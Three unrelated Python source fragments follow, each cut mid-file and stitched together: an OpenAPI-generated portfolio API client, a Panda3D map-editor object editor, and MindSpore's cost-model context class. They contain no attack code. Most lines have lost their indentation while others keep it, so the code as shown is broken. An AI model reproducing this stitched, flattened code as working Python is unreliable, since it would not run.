_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2005, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.portfolio_name_list_get_endpoint.call_with_http_info(**kwargs)
def portfolio_position_list_get(
self,
id,
**kwargs
) -> InlineResponse2006:
"""List all positions of a portfolio. # noqa: E501
List all positions of a portfolio. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
id (str): Identifier of the portfolio.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2006
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['id'] = \
id
return self.portfolio_position_list_get_endpoint.call_with_http_info(**kwargs)
def portfolio_position_list_get_with_http_info(
self,
id,
**kwargs
) -> typing.Tuple[InlineResponse2006, int, typing.MutableMapping]:
"""List all positions of a portfolio. # noqa: E501
List all positions of a portfolio. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
id (str): Identifier of the portfolio.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2006
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['id'] = \
id
return self.portfolio_position_list_get_endpoint.call_with_http_info(**kwargs)
def portfolio_position_list_get_async(
self,
id,
**kwargs
) -> "ApplyResult[InlineResponse2006]":
"""List all positions of a portfolio. # noqa: E501
List all positions of a portfolio. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
id (str): Identifier of the portfolio.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2006]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['id'] = \
id
return self.portfolio_position_list_get_endpoint.call_with_http_info(**kwargs)
def portfolio_position_list_get_with_http_info_async(
self,
id,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2006, int, typing.MutableMapping]]":
"""List all positions of a portfolio. # noqa: E501
List all positions of a portfolio. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
id (str): Identifier of the portfolio.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force | |
# Copyright 2020 <NAME>
# SPDX-License-Identifier: Apache-2.0
import typing
from direct.showbase import DirectObject
from panda3d import core
from .. import cameras, dialogs, edit_menu, edit_mode, editor, map_data
from .. import menu as context_menu
from ..editor import highlighter, map_editor, map_objects, operations
from ..editor.descriptors import constants as descriptor_constants
from ..editor.descriptors import sprite_type
from ..editor.highlighting import highlight_details
from ..editor.properties import sprite_properties
from .sector_effects import property_editor
class ObjectEditor:
    def __init__(
        self,
        editor_dialogs: dialogs.Dialogs,
        make_clicker_callback,
        camera_collection: cameras.Cameras,
        edit_mode_selector: edit_mode.EditMode,
        menu: edit_menu.EditMenu,
    ):
        """Wire up object editing: dialogs, property editor and mouse clickers.

        :param editor_dialogs: dialog collection (sprite/wall properties).
        :param make_clicker_callback: factory registering mouse click handlers.
        :param camera_collection: cameras, also used for on-screen info text.
        :param edit_mode_selector: selector for pushing/popping edit modes.
        :param menu: the edit menu that commands are added to.
        """
        self._dialogs = editor_dialogs
        # Set later by setup(), once a map editor and highlighter exist.
        self._editor: map_editor.MapEditor = None
        self._highlighter: highlighter.Highlighter = None
        self._camera_collection = camera_collection
        self._edit_mode_selector = edit_mode_selector
        self._menu = menu
        # Dedicated edit mode used when editing sector effects/properties.
        self._property_editor = property_editor.EditMode(
            camera_collection=self._camera_collection,
            edit_mode_selector=self._edit_mode_selector,
            menu=self._menu,
        )
        # Template sprite for _add_sprite_to_sector; None means "make new".
        self._copy_sprite: map_objects.EditorSprite = None
        # Left click selects; double click opens the property editor.
        make_clicker_callback(
            [core.MouseButton.one()],
            on_click=self._select_object,
            on_double_click=self._edit_object_properties,
        )
        # Ctrl + left click appends to the current selection.
        make_clicker_callback(
            [core.KeyboardButton.control(), core.MouseButton.one()],
            on_click=self._select_object_append,
        )
def setup(
self, editor: map_editor.MapEditor, object_highlighter: highlighter.Highlighter
):
self._editor = editor
self._property_editor.set_editor(self._editor)
self._highlighter = object_highlighter
def setup_commands(
self, event_handler: DirectObject.DirectObject, menu: context_menu.Menu
):
self._menu.add_command(label="Join sectors (j)", command=self._join_sectors)
self._menu.add_command(label="Split (space)", command=self._split_selection)
self._menu.add_command(
label="Extrude (shift+space)", command=self._extrude_selection
)
self._menu.add_command(
label="Delete selected object (delete)", command=self._delete_selected
)
self._menu.add_command(
label="Bind objects together for actions (b)", command=self._bind_objects
)
self._menu.add_command(label="Decrease shade (-)", command=self._decrease_shade)
self._menu.add_command(label="Increase shade (+)", command=self._increase_shade)
self._menu.add_separator()
self._menu.add_command(
label="Change tile (v)", command=self._show_tile_selector
)
self._menu.add_separator()
self._menu.add_command(label="Insert sprite (s)", command=self._add_sprite)
self._menu.add_command(
label="Move sprite to ceiling (home)",
command=self._move_selected_to_ceiling,
)
self._menu.add_command(
label="Move sprite to floor (end)", command=self._move_selected_to_floor
)
self._menu.add_command(
label="Decrease sprite angle (,)", command=self._decrease_angle
)
self._menu.add_command(
label="Decrease sprite angle (.)", command=self._increase_angle
)
self._menu.add_command(
label="Change sprite facing attribute (r)",
command=self._change_sprite_facing_or_set_relative,
)
self._menu.add_command(
label="Toggle sector floor/ceiling relative to first wall (r)",
command=self._change_sprite_facing_or_set_relative,
)
self._menu.add_command(
label="Flip sprite/wall/sector floor/wall (f)", command=self._flip
)
self._menu.add_separator()
self._menu.add_command(
label="Set sector reference wall (1)", command=self._set_sector_first_wall
)
self._menu.add_command(
label="Swap wall texture (2)", command=self._swap_lower_texture
)
self._menu.add_command(
label="Change wall texture pegging (o)", command=self._toggle_wall_peg
)
self._menu.add_command(
label="Decrease sector slope (;)", command=self._decrease_slope
)
self._menu.add_command(
label="Increase sector slope (')", command=self._increase_slope
)
self._menu.add_separator()
self._menu.add_command(
label="Automatically Light Map", command=self._auto_light
)
self._menu.add_command(label="Fix Common Map Errors", command=self._fix_sectors)
event_handler.accept("j", self._join_sectors)
event_handler.accept("space", self._split_selection)
event_handler.accept("shift-space", self._extrude_selection)
event_handler.accept("v", self._change_tile)
event_handler.accept("s", self._add_sprite)
event_handler.accept("delete", self._delete_selected)
event_handler.accept("b", self._bind_objects)
event_handler.accept("n", self._toggle_blocking_state)
event_handler.accept("t", self._toggle_translucent_state)
event_handler.accept("home", self._move_selected_to_ceiling)
event_handler.accept("end", self._move_selected_to_floor)
event_handler.accept("control-page_up", self._move_sector_up)
event_handler.accept("control-page_up-repeat", self._move_sector_up)
event_handler.accept("control-page_down", self._move_sector_down)
event_handler.accept("control-page_down-repeat", self._move_sector_down)
event_handler.accept("page_up", self._move_sector_part_up)
event_handler.accept("page_up-repeat", self._move_sector_part_up)
event_handler.accept("page_down", self._move_sector_part_down)
event_handler.accept("page_down-repeat", self._move_sector_part_down)
event_handler.accept(",", self._decrease_angle)
event_handler.accept(",-repeat", self._decrease_angle)
event_handler.accept(".", self._increase_angle)
event_handler.accept(".-repeat", self._increase_angle)
event_handler.accept("1", self._set_sector_first_wall)
event_handler.accept("2", self._swap_lower_texture)
event_handler.accept(";", self._decrease_slope)
event_handler.accept(";-repeat", self._decrease_slope)
event_handler.accept("'", self._increase_slope)
event_handler.accept("'-repeat", self._increase_slope)
event_handler.accept("r", self._change_sprite_facing_or_set_relative)
event_handler.accept("f", self._flip)
event_handler.accept("o", self._toggle_wall_peg)
event_handler.accept("m", self._toggle_wall_middle)
event_handler.accept("-", self._decrease_shade)
event_handler.accept("--repeat", self._decrease_shade)
event_handler.accept("=", self._increase_shade)
event_handler.accept("=-repeat", self._increase_shade)
self._setup_context_menu(menu)
    def set_copy_sprite(self, sprite: map_objects.EditorSprite):
        # Remember the sprite to duplicate when new sprites are inserted.
        self._copy_sprite = sprite
def _auto_light(self):
operations.auto_light.AutoLight(self._editor.sectors).apply()
def _fix_sectors(self):
details = operations.map_fixer.MapFixer(self._editor.sectors).apply()
self._camera_collection.set_info_text(
f"Removed {details.sectors_removed} sectors, {details.walls_removed} walls. Fixed {details.walls_fixed} walls, {details.sprites_fixed} sprites"
)
def _setup_context_menu(self, menu: context_menu.Menu):
self._setup_wall_context_menu(menu.add_sub_menu("Edit"))
self._setup_sprite_context_menu(menu.add_sub_menu("Add Sprite"))
menu.add_command("Fill out sector behind wall", self._fill_wall_sector)
menu.add_command("Gradient Floor Heights", self._gradient_floor_heights)
    def _setup_wall_context_menu(self, menu: context_menu.Menu):
        # Commands shown in the "Edit" sub-menu of the context menu.
        menu.add_command("Extrude", self._extrude_selection)
def _setup_sprite_context_menu(self, menu: context_menu.Menu):
category_menus = {}
for category in descriptor_constants.sprite_category_descriptors.keys():
category_menus[category] = menu.add_sub_menu(category)
for sprite_type, sprite_descriptor in descriptor_constants.sprite_types.items():
category_menus[sprite_descriptor.category].add_command(
sprite_descriptor.name,
self._add_sprite_from_context_menu_callback(
sprite_type, sprite_descriptor
),
)
def _gradient_floor_heights(self):
selected = self._highlighter.select_append(
selected_type_or_types=map_objects.EditorSector
)
operations.gradient_heights.GradientHeights(
[selected_object.map_object for selected_object in selected],
map_objects.EditorSector.FLOOR_PART,
).apply()
def _fill_wall_sector(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
result = operations.sector_fill.SectorFill(
selected.map_object.get_sector(), self._editor.sectors
).fill(selected.map_object)
if result:
self._camera_collection.set_info_text("Filled out sector")
def _edit_object_properties(self):
selected = self._highlighter.select()
if selected is None:
return
if isinstance(selected.map_object, map_objects.sprite.EditorSprite):
self._dialogs.sprite_properties.show(selected.map_object)
elif isinstance(selected.map_object, map_objects.EditorSector):
self._property_editor.set_sector(selected.map_object)
self._edit_mode_selector.push_mode(self._property_editor)
elif isinstance(selected.map_object, map_objects.EditorWall):
self._dialogs.wall_properties.show(selected.map_object)
self._highlighter.update_selected_target_view()
    def _select_object(self):
        # Replace the current selection with the object under the mouse.
        self._highlighter.select()
    def _select_object_append(self):
        # Add the object under the mouse to the current selection.
        self._highlighter.select_append()
    def _decrease_shade(self):
        # Step the shade of the selection down by 0.01.
        self._increment_shade(-0.01)
    def _increase_shade(self):
        # Step the shade of the selection up by 0.01.
        self._increment_shade(0.01)
def _increment_shade(self, amount):
selected = self._highlighter.select_append(no_append_if_not_selected=True)
original_shades = [
selected_item.map_object.get_shade(selected_item.part)
for selected_item in selected
]
for index, selected_item in enumerate(selected):
shade = original_shades[index]
selected_item.map_object.set_shade(selected_item.part, shade + amount)
if len(selected) > 0:
first_selected = selected[0]
shade = first_selected.map_object.get_shade(first_selected.part)
build_shade = editor.to_build_shade(shade)
self._camera_collection.set_info_text(f"Shade: {build_shade}")
def _change_sprite_facing_or_set_relative(self):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=[map_objects.EditorSprite, map_objects.EditorSector],
)
for selected_item in selected:
if isinstance(selected_item.map_object, map_objects.EditorSprite):
operations.sprite_facing.SpriteFacing(
selected_item.map_object
).change_facing()
else:
operations.sector_relative_swap.SectorRelativeSwap(
selected_item.map_object, selected_item.part
).toggle()
def _flip(self):
selected = self._highlighter.select_append(no_append_if_not_selected=True)
for selected_item in selected:
operations.flip.Flip(
self._editor.undo_stack, selected_item.map_object, selected_item.part
).flip()
    def _bind_objects(self):
        """Bind selection for transmit/receive: last picked transmits, rest receive.

        With a single selected object, clears its existing bindings instead.
        """
        selected = self._highlighter.select_append()
        if len(selected) < 1:
            return
        if len(selected) < 2:
            # Single selection: remove any existing bindings from the object.
            selected_object = selected[0]
            selected_object.map_object.set_source_event_grouping(None)
            selected_object.map_object.set_target_event_grouping(None)
            self._highlighter.update_selected_target_view()
            self._camera_collection.set_info_text("Removed transmit/receive binding")
            return
        # Last selected object transmits to all previously selected ones.
        transmitter = selected[-1]
        receivers = selected[:-1]
        selected_objects = [item.map_object for item in receivers]
        grouping = self._editor.sectors.event_groupings.get_grouping(
            transmitter.map_object, selected_objects
        )
        if grouping is None:
            return
        transmitter.map_object.set_target_event_grouping(grouping)
        for selected_object in receivers:
            selected_object.map_object.set_source_event_grouping(grouping)
        self._highlighter.update_selected_target_view()
        self._camera_collection.set_info_text("Bound objects for transmit/receive")
def _toggle_blocking_state(self):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=[map_objects.EditorWall, map_objects.EditorSprite],
)
for selected_item in selected:
operations.object_blocking.ObjectBlocking(
selected_item.map_object, selected_item.part
).toggle()
stat = selected_item.map_object.get_stat_for_part(selected_item.part)
self._camera_collection.set_info_text(
f"Blocking: {stat.blocking}, Blocking 2: {stat.blocking2}"
)
def _toggle_translucent_state(self):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=[map_objects.EditorWall, map_objects.EditorSprite],
)
for selected_item in selected:
operations.object_translucency.ObjectTranslucency(
selected_item.map_object, selected_item.part
).toggle()
stat = selected_item.map_object.get_stat_for_part(selected_item.part)
self._camera_collection.set_info_text(
f"Translucency: {stat.translucent}, Translucency Reverse: {stat.translucent_rev}"
)
    def _decrease_slope(self):
        # Step the slope (heinum) of the selection down by 0.01.
        self._increment_slope(-0.01)
    def _increase_slope(self):
        # Step the slope (heinum) of the selection up by 0.01.
        self._increment_slope(0.01)
def _increment_slope(self, amount):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=map_objects.EditorSector,
)
for selected_item in selected:
operations.increment_sector_heinum.IncrementSectorHeinum(
selected_item.map_object, selected_item.part
).increment(amount)
if len(selected) > 0:
first_selected = selected[0]
heinum = first_selected.map_object.get_heinum(first_selected.part)
build_heinum = editor.to_build_heinum(heinum)
self._camera_collection.set_info_text(f"Heinum: {build_heinum}")
def _set_sector_first_wall(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
selected.map_object.get_sector().set_first_wall(selected.map_object)
def _swap_lower_texture(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
operations.swap_wall_bottom.SwapWallBottom(selected.map_object).toggle()
def _toggle_wall_peg(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
operations.swap_wall_peg.SwapWallPeg(
selected.map_object, selected.part
).toggle()
def _toggle_wall_middle(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
operations.toggle_wall_middle.ToggleWallMiddle(
selected.map_object, selected.part
).toggle()
def _decrease_angle(self):
with self._editor.undo_stack.multi_step_undo("Decrease Angle"):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=[
map_objects.EditorSector,
map_objects.EditorSprite,
],
)
for selected_item in selected:
if isinstance(selected_item.map_object, map_objects.EditorSprite):
operations.sprite_angle_update.SpriteAngleUpdate(
selected_item.map_object
).increment(-15)
elif isinstance(selected_item.map_object, map_objects.EditorSector):
operations.sector_rotate.SectorRotate(
selected_item.map_object
).rotate(-15)
def _increase_angle(self):
with self._editor.undo_stack.multi_step_undo("Increase Angle"):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=[
map_objects.EditorSector,
map_objects.EditorSprite,
],
)
for selected_item in selected:
if isinstance(selected_item.map_object, map_objects.EditorSprite):
operations.sprite_angle_update.SpriteAngleUpdate(
selected_item.map_object
).increment(15)
elif isinstance(selected_item.map_object, map_objects.EditorSector):
operations.sector_rotate.SectorRotate(
selected_item.map_object
).rotate(15)
def _delete_selected(self):
selected = self._highlighter.select_append(no_append_if_not_selected=True)
for selected_item in selected:
if selected_item.map_object.is_marker:
continue
if isinstance(selected_item.map_object, map_objects.EditorSprite):
selected_item.map_object.sector.remove_sprite(selected_item.map_object)
elif isinstance(selected_item.map_object, map_objects.EditorWall):
operations.wall_delete.WallDelete(selected_item.map_object).delete()
else:
operations.sector_delete.SectorDelete(
selected_item.map_object, self._editor.sectors
).delete()
    def _add_sprite_from_context_menu_callback(
        self, sprite_type: int, descriptor: sprite_type.SpriteType
    ):
        """Return a menu callback that inserts a sprite described by *descriptor*.

        NOTE(review): the ``sprite_type`` parameter shadows the imported
        ``sprite_type`` module inside this method and appears unused in the
        callback body — confirm whether it is still needed.
        """
        def _callback():
            with self._editor.undo_stack.multi_step_undo("Add Sprite"):
                selected = self._highlighter.select()
                if selected is None:
                    return
                blood_sprite = map_data.sprite.Sprite.new()
                sprite = selected.map_object.add_sprite(blood_sprite)
                sprite_properties.SpriteDialog.apply_sprite_properties(
                    sprite, descriptor, descriptor.default_tile, descriptor.palette
                )
                # Snap the insertion point to the editor grid.
                hit_position = self._editor.snapper.snap_to_grid_3d(
                    selected.hit_position
                )
                sprite.move_to(hit_position)
        return _callback
    def _add_sprite(self, sprite_type=None):
        """Add a sprite at the current selection (sector floor/ceiling or wall),
        inside a single "Add Sprite" undo step.

        NOTE(review): ``sprite_type`` is accepted but never used in this body --
        confirm whether callers rely on it before removing.
        """
        with self._editor.undo_stack.multi_step_undo("Add Sprite"):
            selected = self._highlighter.select(
                selected_type_or_types=[
                    map_objects.EditorSector,
                    map_objects.EditorWall,
                ]
            )
            if selected is None:
                return
            sprite = self._add_sprite_to_sector(selected)
            if selected.is_floor:
                self._move_sprite_to_floor(sprite)
            elif selected.is_ceiling:
                self._move_sprite_to_ceiling(sprite)
            elif selected.is_wall:
                # Offset the sprite from the wall along its normal (8 units).
                offset = selected.map_object.get_normal_3d() * 8
                sprite.move_to(sprite.position - offset)
                sprite.get_stat_for_part(None).facing = 1
                # Orient the sprite relative to the wall's direction.
                theta = selected.map_object.line_segment.get_direction_theta()
                sprite.set_theta(theta + 180)
            sprite.invalidate_geometry()
def _add_sprite_to_sector(self, selected: highlight_details.HighlightDetails):
sector = selected.get_sector()
hit_position = self._editor.snapper.snap_to_grid_3d(selected.hit_position)
if self._copy_sprite is None:
return sector.add_new_sprite(hit_position)
else:
blood_sprite = self._copy_sprite.sprite.copy()
sprite = sector.add_sprite(blood_sprite)
sprite.set_source_event_grouping(self._copy_sprite.source_event_grouping)
sprite.move_to(hit_position)
return sprite
def _move_selected_to_floor(self):
for selected_item in self._select_sprites_or_sectors():
if selected_item.is_sprite:
self._move_sprite_to_floor(selected_item.map_object)
else:
operations.sector_move_to_adjacent.SectorMoveToAdjacent(
selected_item.map_object, selected_item.part
).move(False)
def _move_sprite_to_floor(self, sprite: map_objects.EditorSprite):
editor_sector = sprite.get_sector()
new_z = editor_sector.floor_z_at_point(sprite.origin_2d)
sprite.set_z_at_bottom(new_z)
def _move_selected_to_ceiling(self):
for selected_item in self._select_sprites_or_sectors():
if selected_item.is_sprite:
self._move_sprite_to_ceiling(selected_item.map_object)
else:
operations.sector_move_to_adjacent.SectorMoveToAdjacent(
selected_item.map_object, selected_item.part
).move(True)
def _move_sprite_to_ceiling(self, sprite: map_objects.EditorSprite):
editor_sector = sprite.get_sector()
new_z = editor_sector.ceiling_z_at_point(sprite.origin_2d)
sprite.set_z_at_top(new_z)
    def _move_sector_up(self):
        """Move the selected sectors one grid step in the -z direction."""
        self._move_sector(-1)
    def _move_sector_down(self):
        """Move the selected sectors one grid step in the +z direction."""
        self._move_sector(1)
def _move_sector(self, direction: float):
selected = self._highlighter.select_append()
sectors: typing.Set[map_objects.EditorSector] = set()
for selected_object in selected:
if isinstance(selected_object.map_object, map_objects.EditorSector):
sectors.add(selected_object.map_object)
amount = direction * self._editor.snapper.grid_size
delta = core.Vec3(0, 0, amount)
for sector in sectors:
sector.move_floor_to(sector.floor_z + amount)
sector.move_ceiling_to(sector.ceiling_z + amount)
for marker in sector.floor_z_motion_markers:
marker.move_to(marker.origin + delta)
for marker in sector.ceiling_z_motion_markers:
marker.move_to(marker.origin + delta)
for sprite in sector.sprites:
sprite.move_to(sprite.origin + delta)
    def _move_sector_part_up(self):
        """Move only the highlighted part of each selected sector one grid step in -z."""
        self._move_sector_part(-1)
    def _move_sector_part_down(self):
        """Move only the highlighted part of each selected sector one grid step in +z."""
        self._move_sector_part(1)
def _move_sector_part(self, direction: float):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=map_objects.EditorSector,
)
amount = direction * self._editor.snapper.grid_size
delta = core.Vec3(0, 0, amount)
for selected_object in selected:
sector = selected_object.map_object
if selected_object.part == map_objects.EditorSector.FLOOR_PART:
sector.move_floor_to(sector.floor_z + amount)
for marker in sector.floor_z_motion_markers:
marker.move_to(marker.origin + delta)
else:
sector.move_ceiling_to(sector.ceiling_z + amount)
for marker in sector.ceiling_z_motion_markers:
marker.move_to(marker.origin + delta)
    def _change_tile(self):
        """Refresh the (appended) selection and open the tile selector for it."""
        self._highlighter.select_append(no_append_if_not_selected=True)
        self._show_tile_selector()
def _show_tile_selector(self):
if len(self._highlighter.selected) < 1:
return
last_selected = self._highlighter.selected[-1]
picnum = last_selected.map_object.get_picnum(last_selected.part)
self._dialogs.tile_dialog.load_tiles()
self._dialogs.tile_dialog.show(picnum, self._handle_tile_selected)
def _handle_tile_selected(self, picnum: int):
for selected in self._highlighter.selected:
selected.map_object.set_picnum(selected.part, picnum)
def _extrude_selection(self):
selected = self._highlighter.select()
if selected is None:
return
if isinstance(selected.map_object, map_objects.EditorWall):
operations.wall_extrude.WallExtrude(
selected.map_object, self._editor.sectors
).extrude()
elif isinstance(selected.map_object, map_objects.EditorSector):
callback = self._extrude_sector_callback(selected.map_object, selected.part)
self._dialogs.ror_type_selector.show(callback)
self._editor.invalidate_view_clipping()
def _extrude_sector_callback(self, map_object: map_objects.EmptyObject, part: str):
def _callback(extrude_type: str):
extrustion = operations.sector_extrude.SectorExtrude(
map_object, self._editor.sectors, part
)
extrustion.extrude(self._editor.find_unused_sprite_data_1(), extrude_type)
self._editor.invalidate_view_clipping()
return _callback
def _split_selection(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
where = self._editor.snapper.snap_to_grid_2d(selected.hit_position.xy)
operations.wall_split.WallSplit(selected.map_object, where).split()
def _join_sectors(self):
selected = self._highlighter.select_append(
selected_type_or_types=map_objects.EditorSector
)
if len(selected) == 2:
self._do_join(selected[0].map_object, selected[1].map_object)
def _do_join(
self, | |
<gh_stars>1-10
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Context of cost_model in auto_parallel"""
import threading
from mindspore._c_expression import CostModelContext
from mindspore._checkparam import args_type_check
class _CostModelContext:
"""
_CostModelContext is the environment in which operations are executed
Note:
Creating a context through instantiating Context object is not recommended.
Use cost_model_context() to get the context since Context is singleton.
"""
_instance = None
_instance_lock = threading.Lock()
    def __init__(self):
        # Bind to the C++ cost-model context singleton exposed by mindspore._c_expression.
        self._context_handle = CostModelContext.get_instance()
def __new__(cls):
if cls._instance is None:
cls._instance_lock.acquire()
cls._instance = object.__new__(cls)
cls._instance_lock.release()
return cls._instance
def set_device_memory_capacity(self, dev_mem_cap):
"""
Set device memory capacity.
Args:
dev_mem_cap (float): The memory capacity for each device.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_device_memory_capacity(dev_mem_cap)
def get_device_memory_capacity(self):
"""
Get device memory capacity.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_device_memory_capacity()
def set_costmodel_alpha(self, alpha):
"""
Set costmodel alpha.
Args:
alpha (float): The parameter costmodel_alpha used in strategy-searching algorithm.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_alpha(alpha)
def get_costmodel_alpha(self):
"""
Get costmodel alpha.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_alpha()
def set_costmodel_beta(self, beta):
"""
Set costmodel beta.
Args:
beta (float): The parameter costmodel_beta used in strategy-searching algorithm.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_beta(beta)
def get_costmodel_beta(self):
"""
Get costmodel beta.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_beta()
def set_costmodel_gamma(self, gamma):
"""
Set costmodel gamma.
Args:
gamma (float): The parameter costmodel_gamma used in strategy-searching algorithm.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_gamma(gamma)
def get_costmodel_gamma(self):
"""
Get costmodel gamma.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_gamma()
def set_costmodel_communi_threshold(self, threshold):
"""
Set costmodel communication threshold.
Args:
threshold (float): A parameter used in adjusting communication calculation for practice.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_communi_threshold(threshold)
def get_costmodel_communi_threshold(self):
"""
Get costmodel communication threshold.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_communi_threshold()
def set_costmodel_communi_const(self, communi_const):
"""
Set costmodel communication const.
Args:
const (float): A parameter used in adjusting communication calculation for practice.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_communi_const(communi_const)
def get_costmodel_communi_const(self):
"""
Get costmodel communication const.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_communi_const()
def set_costmodel_communi_bias(self, communi_bias):
"""
Set costmodel communication bias.
Args:
bias (float): A parameter used in adjusting communication calculation for practice.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_communi_bias(communi_bias)
def get_costmodel_communi_bias(self):
"""
Get costmodel communication bias.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
